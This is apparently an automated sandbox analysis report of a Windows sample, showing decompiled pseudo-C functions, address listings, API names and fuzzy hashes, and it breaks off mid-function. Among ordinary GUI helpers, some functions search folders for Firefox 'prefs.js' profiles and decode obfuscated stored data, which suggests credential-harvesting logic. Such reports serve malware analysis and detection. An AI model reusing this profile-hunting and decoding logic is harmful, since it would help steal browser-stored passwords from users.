                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004021E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E004021E0(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E00407A69(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041203C();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E00407A69( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E00407A69( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

















                                                                                                                                                                  0x004021e0
                                                                                                                                                                  0x004021e4
                                                                                                                                                                  0x004021ea
                                                                                                                                                                  0x004021ee
                                                                                                                                                                  0x004021f0
                                                                                                                                                                  0x004021f3
                                                                                                                                                                  0x004022d1
                                                                                                                                                                  0x004022d4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402381
                                                                                                                                                                  0x004022da
                                                                                                                                                                  0x004022db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402379
                                                                                                                                                                  0x004022e1
                                                                                                                                                                  0x004022e2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402371
                                                                                                                                                                  0x004022e8
                                                                                                                                                                  0x004022e9
                                                                                                                                                                  0x00402308
                                                                                                                                                                  0x00402311
                                                                                                                                                                  0x00402325
                                                                                                                                                                  0x00402339
                                                                                                                                                                  0x0040234d
                                                                                                                                                                  0x00402361
                                                                                                                                                                  0x0040224d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040224d
                                                                                                                                                                  0x00402367
                                                                                                                                                                  0x00402354
                                                                                                                                                                  0x00402354
                                                                                                                                                                  0x00402354
                                                                                                                                                                  0x00402340
                                                                                                                                                                  0x00402340
                                                                                                                                                                  0x00402340
                                                                                                                                                                  0x0040232c
                                                                                                                                                                  0x0040232c
                                                                                                                                                                  0x0040232c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402318
                                                                                                                                                                  0x00402318
                                                                                                                                                                  0x00402276
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402276
                                                                                                                                                                  0x00402311
                                                                                                                                                                  0x004022eb
                                                                                                                                                                  0x004022ec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402300
                                                                                                                                                                  0x004022ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022f5
                                                                                                                                                                  0x0040223d
                                                                                                                                                                  0x0040223f
                                                                                                                                                                  0x00402241
                                                                                                                                                                  0x00402243
                                                                                                                                                                  0x00402244
                                                                                                                                                                  0x00402245
                                                                                                                                                                  0x0040224a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040223f
                                                                                                                                                                  0x004021f9
                                                                                                                                                                  0x004022c9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022c9
                                                                                                                                                                  0x00402202
                                                                                                                                                                  0x00402294
                                                                                                                                                                  0x004022b9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022be
                                                                                                                                                                  0x0040220a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402280
                                                                                                                                                                  0x0040220f
                                                                                                                                                                  0x00402270
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402270
                                                                                                                                                                  0x00402214
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040225f
                                                                                                                                                                  0x00402219
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402254
                                                                                                                                                                  0x0040221e
                                                                                                                                                                  0x00402237
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402237
                                                                                                                                                                  0x00402223
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040222c
                                                                                                                                                                  0x00402233
                                                                                                                                                                  0x0040222e
                                                                                                                                                                  0x0040222e
                                                                                                                                                                  0x0040222e
                                                                                                                                                                  0x00402230
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _ultoasprintf
                                                                                                                                                                  • String ID: %s %s %s
                                                                                                                                                                  • API String ID: 432394123-3850900253
                                                                                                                                                                  • Opcode ID: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                                                                                                                                                                  • Instruction ID: 4550bc8a79151648f87db51bd02682248f93ba3dc48fc4e36bbc9480066499b4
                                                                                                                                                                  • Opcode Fuzzy Hash: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                                                                                                                                                                  • Instruction Fuzzy Hash: F741F731904B16C7CA34956487CCBEBA298E702304F6504BFDC5AF72D0D2FCAE46866B
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040851B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040851B(intOrPtr* __esi, struct HWND__* _a4) {
				long _v12;
				int _v16;
				int _v20;
				int _v28;
				signed int _v32;
				int _v36;
				void* _v40;
				long _t16;
				intOrPtr _t22;
				void* _t24;
				signed int _t25;
				void* _t26;
				int _t27;
				intOrPtr* _t28;

				_t28 = __esi;
				if(_a4 == 0) {
					L12:
					return _t16;
				}
				_t22 =  *((intOrPtr*)(__esi + 4));
				_t26 = 0;
				_t24 = 0;
				if(_t22 <= 0) {
					L6:
					_t27 = 0;
					if(_t22 <= 0) {
						goto L12;
					} else {
						goto L7;
					}
					do {
						L7:
						_t16 =  *_t28 + _t27 * 4;
						_t25 =  *_t16 & 0x0000ffff;
						if(_t25 >= 0 && _t25 < 0x7d0) {
							_t16 =  *((short*)(_t16 + 2));
							if(_t16 < _t22) {
								_v12 = _t16;
								_v40 = 0x22;
								_v32 = _t25;
								_v36 = 0;
								_v28 = 0;
								_v20 = 0;
								_v16 = 0;
								_t16 = SendMessageA(_a4, 0x101a, _t27,  &_v40);
							}
						}
						_t22 =  *((intOrPtr*)(_t28 + 4));
						_t27 = _t27 + 1;
					} while (_t27 < _t22);
					goto L12;
				}
				_t16 =  *__esi + 2;
				do {
					if( *_t16 != 0) {
						goto L5;
					}
					_t26 = _t26 + 1;
					if(_t26 >= 2) {
						goto L12;
					}
					L5:
					_t24 = _t24 + 1;
					_t16 = _t16 + 4;
				} while (_t24 < _t22);
				goto L6;
			}

















                                                                                                                                                                  0x0040851b
                                                                                                                                                                  0x00408528
                                                                                                                                                                  0x004085a8
                                                                                                                                                                  0x004085a8
                                                                                                                                                                  0x004085a8
                                                                                                                                                                  0x0040852a
                                                                                                                                                                  0x0040852d
                                                                                                                                                                  0x0040852f
                                                                                                                                                                  0x00408533
                                                                                                                                                                  0x0040854c
                                                                                                                                                                  0x0040854c
                                                                                                                                                                  0x00408550
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408552
                                                                                                                                                                  0x00408552
                                                                                                                                                                  0x00408554
                                                                                                                                                                  0x00408557
                                                                                                                                                                  0x0040855d
                                                                                                                                                                  0x00408566
                                                                                                                                                                  0x0040856c
                                                                                                                                                                  0x0040856e
                                                                                                                                                                  0x00408581
                                                                                                                                                                  0x00408588
                                                                                                                                                                  0x0040858b
                                                                                                                                                                  0x0040858e
                                                                                                                                                                  0x00408591
                                                                                                                                                                  0x00408594
                                                                                                                                                                  0x00408597
                                                                                                                                                                  0x00408597
                                                                                                                                                                  0x0040856c
                                                                                                                                                                  0x0040859d
                                                                                                                                                                  0x004085a0
                                                                                                                                                                  0x004085a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408552
                                                                                                                                                                  0x00408538
                                                                                                                                                                  0x00408539
                                                                                                                                                                  0x0040853c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040853e
                                                                                                                                                                  0x00408542
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408544
                                                                                                                                                                  0x00408544
                                                                                                                                                                  0x00408545
                                                                                                                                                                  0x00408548
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: "$\LA
                                                                                                                                                                  • API String ID: 3850602802-1791104459
                                                                                                                                                                  • Opcode ID: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                                                                                                                                                                  • Instruction ID: ec77e5a748e9a6ff816ea2aa2a284b6bdb41b89871e7a2a93e67b2087f5a6bee
                                                                                                                                                                  • Opcode Fuzzy Hash: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                                                                                                                                                                  • Instruction Fuzzy Hash: 52115171A00115AEDB149F9ACEC04BEB7F5FB98305B50843FD1D6E7680DB789982CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D9D8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E0040D9D8(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				void* _t42;
				intOrPtr* _t44;

				_t42 = __edx;
				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t44 = __ecx;
				E00406FD2( &_v1300, __eflags, "*.*", _a4);
				while(E0040702D( &_v1300) != 0) {
					__eflags = E00406F97( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L00412072();
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E00406155( &_v652);
								if(__eflags != 0) {
									E0040D7C1(_t44, _t42, __eflags,  &_v652);
								}
							}
						}
					} else {
						_a8 = _a8 + 1;
						E0040D9D8(_t44, _t42, __eflags,  &_v652, _a8);
					}
				}
				E004070C5( &_v1300);
				return 1;
			}












                                                                                                                                                                  0x0040d9d8
                                                                                                                                                                  0x0040d9e4
                                                                                                                                                                  0x0040d9ef
                                                                                                                                                                  0x0040d9f3
                                                                                                                                                                  0x0040d9fa
                                                                                                                                                                  0x0040da0a
                                                                                                                                                                  0x0040da0c
                                                                                                                                                                  0x0040da76
                                                                                                                                                                  0x0040da1c
                                                                                                                                                                  0x0040da1e
                                                                                                                                                                  0x0040da37
                                                                                                                                                                  0x0040da3b
                                                                                                                                                                  0x0040da3d
                                                                                                                                                                  0x0040da44
                                                                                                                                                                  0x0040da49
                                                                                                                                                                  0x0040da4a
                                                                                                                                                                  0x0040da4f
                                                                                                                                                                  0x0040da53
                                                                                                                                                                  0x0040da62
                                                                                                                                                                  0x0040da65
                                                                                                                                                                  0x0040da71
                                                                                                                                                                  0x0040da71
                                                                                                                                                                  0x0040da65
                                                                                                                                                                  0x0040da53
                                                                                                                                                                  0x0040da20
                                                                                                                                                                  0x0040da20
                                                                                                                                                                  0x0040da30
                                                                                                                                                                  0x0040da30
                                                                                                                                                                  0x0040da1e
                                                                                                                                                                  0x0040da87
                                                                                                                                                                  0x0040da93

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen$FileFindFirst
                                                                                                                                                                  • String ID: *.*$prefs.js
                                                                                                                                                                  • API String ID: 2516927864-1592826420
                                                                                                                                                                  • Opcode ID: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                                                                                                                                                                  • Instruction ID: 0a1894bf97bc7f37e7ea977f35cd1e9cdc16bb9bd7797736beedadfbd1967f85
                                                                                                                                                                  • Opcode Fuzzy Hash: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1811947250C3465ED720EAA58C01ADB7BD89F55314F14863FF898E21C2D738D61DCB9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004066AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004066AF(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}



















                                                                                                                                                                  0x004066af
                                                                                                                                                                  0x004066af
                                                                                                                                                                  0x004066af
                                                                                                                                                                  0x004066b7
                                                                                                                                                                  0x004066ba
                                                                                                                                                                  0x004066bc
                                                                                                                                                                  0x004066bc
                                                                                                                                                                  0x004066be
                                                                                                                                                                  0x004066c2
                                                                                                                                                                  0x004066c6
                                                                                                                                                                  0x004066ca
                                                                                                                                                                  0x004066d0
                                                                                                                                                                  0x004066d6
                                                                                                                                                                  0x004066d9
                                                                                                                                                                  0x004066e3
                                                                                                                                                                  0x004066ea
                                                                                                                                                                  0x004066ed
                                                                                                                                                                  0x004066f0
                                                                                                                                                                  0x004066f7
                                                                                                                                                                  0x00406706
                                                                                                                                                                  0x00406724
                                                                                                                                                                  0x00406708
                                                                                                                                                                  0x0040670a
                                                                                                                                                                  0x0040670f
                                                                                                                                                                  0x0040670f
                                                                                                                                                                  0x00406715
                                                                                                                                                                  0x00406720
                                                                                                                                                                  0x00406720

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileNameSavestrcpy
                                                                                                                                                                  • String ID: L
                                                                                                                                                                  • API String ID: 1182090483-2909332022
                                                                                                                                                                  • Opcode ID: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                                                                                                                                                                  • Instruction ID: d41a0f3581961b0f058ab7b38d8a0fc10f69f88ca1386dcb34cd33e007bc3755
                                                                                                                                                                  • Opcode Fuzzy Hash: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                                                                                                                                                                  • Instruction Fuzzy Hash: D301E9B1D102099FDF10DFA9D8847AEBBF4BF08319F10442AE915E6340DB749955CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407D23, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadMenuA.USER32 ref: 00407D2B
                                                                                                                                                                  • sprintf.MSVCRT ref: 00407D4E
                                                                                                                                                                    • Part of subcall function 00407BCE: GetMenuItemCount.USER32 ref: 00407BE4
                                                                                                                                                                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C08
                                                                                                                                                                    • Part of subcall function 00407BCE: GetMenuItemInfoA.USER32 ref: 00407C3E
                                                                                                                                                                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C6B
                                                                                                                                                                    • Part of subcall function 00407BCE: strchr.MSVCRT ref: 00407C77
                                                                                                                                                                    • Part of subcall function 00407BCE: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407CD2
                                                                                                                                                                    • Part of subcall function 00407BCE: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407CEE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                                                                                                  • String ID: menu_%d
                                                                                                                                                                  • API String ID: 3671758413-2417748251
                                                                                                                                                                  • Opcode ID: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                                                                                                                                                                  • Instruction ID: 2770b7a066d609e077f5412e4a2b93c9a9718e974603bd13de201155b170d4e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                                                                                                                                                                  • Instruction Fuzzy Hash: 25D0C271A4911036CB2133366C0AFDB3C288BD2719F28406EF000650C1CABCA182827E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004084B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004084B2(char* __esi) {
				char* _t2;
				char* _t6;

				_t6 = __esi;
				E0040616A(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				return strcat(_t6, "_lng.ini");
			}





                                                                                                                                                                  0x004084b2
                                                                                                                                                                  0x004084b3
                                                                                                                                                                  0x004084bb
                                                                                                                                                                  0x004084c5
                                                                                                                                                                  0x004084c7
                                                                                                                                                                  0x004084c7
                                                                                                                                                                  0x004084d7

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040616A: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,004084B8,00000000,004083D6,?,00000000,00000104,?), ref: 00406175
                                                                                                                                                                  • strrchr.MSVCRT ref: 004084BB
                                                                                                                                                                  • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 004084D0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNamestrcatstrrchr
                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                  • API String ID: 3097366151-1948609170
                                                                                                                                                                  • Opcode ID: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                                                                                                                                                                  • Instruction ID: 42c27a01d44ad3a484ea9941e8a753782f6a4a1a49f0a0828630b4f1254f47e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                                                                                                                                                                  • Instruction Fuzzy Hash: 98C0126924565024D12621215E03B8A09494F26319F24416BF501781C3EE9C46E1806E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407570, Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E00407570(char* __eax, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046E1( &_v1068);
						if(E004047AA( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E0040481B(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060DA(0xff, _t75, _a8);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047FB( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}






























                                                                                                                                                                  0x0040757c
                                                                                                                                                                  0x0040757f
                                                                                                                                                                  0x00407584
                                                                                                                                                                  0x00407586
                                                                                                                                                                  0x0040758c
                                                                                                                                                                  0x00407592
                                                                                                                                                                  0x00407592
                                                                                                                                                                  0x00407592
                                                                                                                                                                  0x00407593
                                                                                                                                                                  0x004076b4
                                                                                                                                                                  0x004075a2
                                                                                                                                                                  0x004075b0
                                                                                                                                                                  0x004075b7
                                                                                                                                                                  0x004075bf
                                                                                                                                                                  0x004075c3
                                                                                                                                                                  0x004075cb
                                                                                                                                                                  0x004075d1
                                                                                                                                                                  0x00407605
                                                                                                                                                                  0x00407605
                                                                                                                                                                  0x0040760b
                                                                                                                                                                  0x00407617
                                                                                                                                                                  0x00407620
                                                                                                                                                                  0x00407629
                                                                                                                                                                  0x0040763a
                                                                                                                                                                  0x00407641
                                                                                                                                                                  0x0040764b
                                                                                                                                                                  0x0040764d
                                                                                                                                                                  0x00407657
                                                                                                                                                                  0x00407659
                                                                                                                                                                  0x00407659
                                                                                                                                                                  0x00407666
                                                                                                                                                                  0x0040766d
                                                                                                                                                                  0x00407674
                                                                                                                                                                  0x0040767c
                                                                                                                                                                  0x00407682
                                                                                                                                                                  0x0040768a
                                                                                                                                                                  0x0040769a
                                                                                                                                                                  0x0040769f
                                                                                                                                                                  0x0040769f
                                                                                                                                                                  0x0040764b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004076ab
                                                                                                                                                                  0x004075d8
                                                                                                                                                                  0x004075db
                                                                                                                                                                  0x004075dc
                                                                                                                                                                  0x004075ee
                                                                                                                                                                  0x004075f0
                                                                                                                                                                  0x004075f7
                                                                                                                                                                  0x004075f8
                                                                                                                                                                  0x004075fb
                                                                                                                                                                  0x004075fb
                                                                                                                                                                  0x004075fc
                                                                                                                                                                  0x004075fc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004075dc

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3110682361-0
                                                                                                                                                                  • Opcode ID: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                                                                                                                                                                  • Instruction ID: a7b320da169f7f969887caa54c031871a44602910a4795043d90d4c59a740d9e
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                                                                                                                                                                  • Instruction Fuzzy Hash: B0312972D0011D9BDB10DB68CC81BDEBBB8EF45318F1006B6E545B3281DA79AE858B95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408638, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E00408638(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x414350;
				_t22 = E00406578(0x1c8, __esi);
				_push(0x14);
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
